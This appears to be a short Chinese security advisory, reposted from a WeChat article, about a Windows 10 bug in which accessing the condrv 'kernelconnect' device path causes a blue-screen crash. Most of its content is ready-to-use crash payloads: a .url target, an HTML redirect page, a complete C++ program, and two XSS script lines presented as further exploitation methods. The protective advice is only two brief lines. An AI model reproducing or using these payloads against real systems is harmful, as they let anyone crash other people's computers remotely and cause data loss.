样本
核心代码为:file:///globalroot/device/condrv/kernelconnect
受灾画面:
分析:
.url文件
url格式的文件是一种网页文件,只要接触就会触发访问
漏洞分析见之前发的文章:
防护方法:
仅对windows10系统有效,其它系统不受影响
windows微信用户可关闭自动下载
更多方式(.html .exe):
<html><head></head><body>><script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script></body></html>
// BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。// #include <iostream>#include <Windows.h> int main(){ WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);}
吾爱破解大牛分析:
https://www.52pojie.cn/thread-1354077-1-1.html
其他利用方式XSS漏洞:
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
<script>document.location = 'file://./globalroot/device/condrv/kernelconnect';</script>
请做好个人防护!谨防漏洞威胁!转载请标注来自开普勒安全团队!谢谢!
转载自https://mp.weixin.qq.com/s/U66SldUJhqtV51WPxQMeCg